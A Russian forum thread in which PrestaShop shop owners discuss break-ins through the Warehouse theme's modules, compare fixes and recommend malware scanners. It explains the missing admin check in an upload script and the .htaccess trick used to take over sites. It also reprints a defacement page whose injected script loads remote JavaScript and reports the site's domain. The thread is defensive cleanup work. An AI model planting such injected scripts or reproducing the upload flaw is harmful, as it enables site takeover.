Информация Уязвимость шаблона Warehouse для Presta

[formfaq]

у ребят разрабов Naxsi из NBS systems на гитхабе валяется утилитка php-malware-finder... пользуюсь ей постоянно если ставлю ченить пи**еное.... - про Naxsi - советую тоже почитать...
ЗЫ. windows - не unix. - это про "качественно проверить"

 

[hitbaby]

Заранее приношу свои извинения, ZIX, т.к. возможно не по теме, НО информация очень важная и фикс очень нужный.
Т.к. покупал шаблон Warehouse у автора официально, за последнюю неделю получил 4 письма от него, с настоятельной рекомендацией обновить шаблон или использовать фикс для модулей.
Но из-за самонадеянности, что меня не затронет обновляться не стал и каждый раз игнорировал эту информацию. Вчера позвонил друг, сказал что его магазины взломали, я опять проигнорировал. Сегодня получил уведомление от Гугл Вебмастер, что у сайта новый владелец и только тогда понял что затонуло и меня.
У меня 2 магазина на одном ВДС сервере, оба сайта взломаны неоднократно разными людьми и неизвестно сколько раз людьми которые не оставили своих меток и явно не назвались внутри файлов. Самый старый загруженный сторонний файл от 22.06.2016. Несмотря на это магазины работают нормально и никаких признаков взлома не наблюдается.
Фикс с инструкцией по ссылке: Для просмотра ссылки Войди или Зарегистрируйся
Внутри обновления для модулей, в которых наблюдаются уязвимости в безопасности.
Также фикс есть в версии шаблона 3.7.9, ее кажется выкладывали.
Из 4 моих друзей только у одного все в порядке, настоятельно рекомендую принять к сведению, знаю что огромная часть форумчан использует Warehouse как основной шаблон для своих магазинов.

Подтверждаю уязвимость указанных модулей. Например в columnadverts в uploadimage.php раньше отсутствовала валидация psAdmin $cookie->id_employee и тд,
что давало возможность загружать файлы снаружи.
"Самый старый загруженный сторонний файл от 22.06.2016 людьми которые не оставили своих меток и явно не назвались внутри файлов" - это потому, что
данный файл представляет собой только форму для загрузки файлов в дальнейшем с возможностью редактирования прав на файлы и папки до var - директории.
Перейдите по ссылке (пути) к указанному файлу: .../сторонний файл.php и сами убедитесь. Также проверьте папку .../modules/columnadverts/slides
на наличие php файлов.
Признаки взлома (на скрине) не наблюдаются потому, что в файле .htaccess еще не вставлена строка: DirectoryIndex /папка_взлома/сторонний файл.php

 

[hitbaby]

Не успел обновить последний свой шоп: index.php переписали накидали новых фолдеров в РУТ и пару инородных файлов типа тех что прикрепил. Платежные модули-по моему без изменений.
Чистил по дате изменений в файлах-наблюдаю, в моем каейсе это 25.06.2016, Хотя автор призывает ставить бакап версии, типа шоп заражен и чуть-ли не весь сервер...

Автор прав - необходимо проверить все, так как дата изменений папок и подпапок НЕ меняется при загрузке файлов через уязвимость. Тем более есть возможность доступа к серверу. Наличие папок и файлов в корневой директории это только "отвлекающая терапия" - "специалисты" так не делают.
Для просмотра ссылки Войди или Зарегистрируйся
Вот пример взлома через модуль columnadverts Для просмотра ссылки Войди или Зарегистрируйся

 

[hitbaby]

Проверил остальные модули по инструкции к Фиксу - все ответы нормальные (пустой лист).



нужно ли проверять вышеописанным способом?

Нужно все проверять. Так как нормальные ответы по инструкции к Фиксу - это на будущее.
Вот еще пример: обнаружен в процессе подробного анализа всего сайта в связи выходом important - security hotfix
Файл прилагаю.

 

[aleksey_z]

у ребят разрабов Naxsi из NBS systems на гитхабе валяется утилитка php-malware-finder... пользуюсь ей постоянно если ставлю ченить пи**еное.... - про Naxsi - советую тоже почитать...
ЗЫ. windows - не unix. - это про "качественно проверить"

Привет. как ею пользоваться?

Нужно все проверять. Так как нормальные ответы по инструкции к Фиксу - это на будущее.
Вот еще пример: обнаружен в процессе подробного анализа всего сайта в связи выходом important - security hotfix
Файл прилагаю.

Визуально следов чужого доступа не обнаружил (по аналогии со всеми вышеприведенными примерами). Вообще ни каких. Только на почтовый север ломятся периодически, но сервак блокирует - три неудачных попытки - заблокирован.

 

[_sashok]

Визуально следов чужого доступа не обнаружил (по аналогии со всеми вышеприведенными примерами). Вообще ни каких. Только на почтовый север ломятся периодически, но сервак блокирует - три неудачных попытки - заблокирован.

Визуально сотни папок и исходные коды десятков тысяч файлов работающего сайта нереально вручную проверить - айболитом хотябы пройдитесь

 

[aleksey_z]

Визуально сотни папок и исходные коды десятков тысяч файлов работающего сайта нереально вручную проверить - айболитом хотябы пройдитесь

Привет. Кто разобрался, какой Фикс есть последний и правильный.
По-сравнивал файлы Фикса и файлы модулей из последней обновы 3.7.9 И файлы с Фикса, выложенного на форуме - несколько озадачен или запутался.
Фикс с обновы 3.7.9 - в папках модулей заменяемые файл/файлы.
Обнова 3.7.9 модули (с якобы уже исправленными файлами, если правильно понял с их описания).
1. Advancedslider и Videostab - файлы идентичны.
2. Columnadverts - слева фикс с темы 3.7.9 - справа модуль с обновы 3.7.9 файл columnadverts.js ,
uploadimage.php , , кол-во файлов в фиксе из обновы и из фикса с форума разное , и в них
тоже отличия , другие пока не сравнивал.
3. В модулях homepageadvertise, homepageadvertise2, productpageadverts, simpleslideshow- слева фикс с темы 3.7.9 - справа модуль с обновы 3.7.9
homepageadvertise.js uploadimage.php homepageadvertise2.js и далее идентично. С файлами Фикса с форума пока не сравнивал.

Как разобраться с фиксами?

 

[genokby]

нашел в корне сайта файл id.htm с таким содержимым, качаю айболита посмотрим

<html><head>
<title>Hacked by UnknownYmouz</title><link href=' rel='shortcut icon'/>
<meta name="robots" content="index, follow">
<meta name="description" content="Hacked by UnknownYmouz" /> 
<meta name="googlebot" content="index,follow" />
<meta name="robots" content="all" />
  <meta name="robots schedule" content="auto" />
  <meta name="distribution" content="global" />   <base target='_blank'/>
<link REL="SHORTCUT ICON" HREF="http://www.zone-h.org/images/cflags/png/id.png">
<embed src="https://www.youtube.com/v/rCn0TMqyJtU&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed></center>
<center>
<body bgcolor="#000000"><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnHK9LAxZzNAM%2bKwKjoTSZqstzWCXiKU76YMSHEgRdCfjeaT74DwDI9b3cfvWBUAzyVslAFHWogGRzBGnYooIX3ZXFIzWS1OFGKVTotVzJ6kqYxApr0sFlKdTkmDaUgrkZUF3A%2bmBNbAMYx8nwGKMvIBKRCykmksdl0FaDuXrmwKP4JmlWhOFcm31hr%2br1EfsWIDcBzEDpO6AKUsEdyLpPQSMMkRYJFs%2fq%2bzDdDIITbOUgIITLOp%2f%2bZLbPitoxF3fqdKwSJfeAJjKyQyzv9n1kwcbkeVWrxQ9pgXx62DfJRutkpVwzIZiRZZI3xICkYPDx6AT9Yg3XYbp7ad7ygRpsB5y%2fxreYWnUGgf0A%2bxAWvqE%2bGerqIJy9MhYjHhyAZPVe%2fzfBEFeZ37v7ZwsNlzqoh5LV4nEMjXNh8iS03JcSCTDNepTWgAB6zS0ImXzknDWHzqBOYMfHzG%2bz7Pv%2fC0NSQ5%2bQ2qid6RiCOzAhszHY8z48xjjju8TUu3ED9Ets8Z1iFmV1dVioMehXf6GUQOx5q9N8ETJrkaStkYUBVch6QU3ZVDzkT5vd38DV6pZ3IjBOs1ahjKKYaiA%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
<body oncontextmenu='return false;'></body>
<br><br><br><br><br><br><br><br>
<a href="https://www.facebook.com/IndonesianCodeParty/" target="_blank"><img src="https://www.maxmanroe.com/wp-content/uploads/2015/05/hacker-di-Indonesia-e1431618329770.jpg"height="360px" width="670px"></a></br><br>
<center>
<font face="Courier New" color="grey" size="2px">Hacked by UnknownYmouz</font></br><br>
<center><font face="Courier New" color="grey" size="2px"># Indonesian Code Party #</font></center>
<center><font face="Courier New" color="grey" size="2px">$ ZeynnymouZ | ./BlaDDzeRR | UnknownYmouz | -DenJaka- | Consept_IXI | ./Coco | 0x1999 | Lock-Down | ./UnIX | ./L1ght_R00t | Walkers404 $</font></center>
<center><a href="https://www.facebook.com/IndonesianCodeParty/" target="_blank"><font face="Courier New" color="grey" size="2px"> CONTACT ME </font></a></center>
<style type="text/css">
BODY {
    CURSOR: crosshair
}
</style>
</center>
<center>
<script>
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert("To Admin :\
\
Kindly Patch Your System Immediately !!!\
\
Salam,\
UnknownYmouz");}
document.onkeydown=keypressed;
function kasih_tau(){
alert('Defaced By UnknownYmouz (AGAIN)\
Means No Harm Here...\
Admin, Please Fix It...\
Make It More Secure...\
\
Salam...');
}
</script>
</body></html>

 

[aleksey_z]

айболитом хотя бы пройдитесь

Проверил, вот результат. Как разобрать?

 

[marvinz]

Для просмотра ссылки Войди или Зарегистрируйся, в вашем случае до вас никто еще не добрался, все хорошо. вообще все сообщения по уязвимости варехауса предлагаю вынести из данного топика.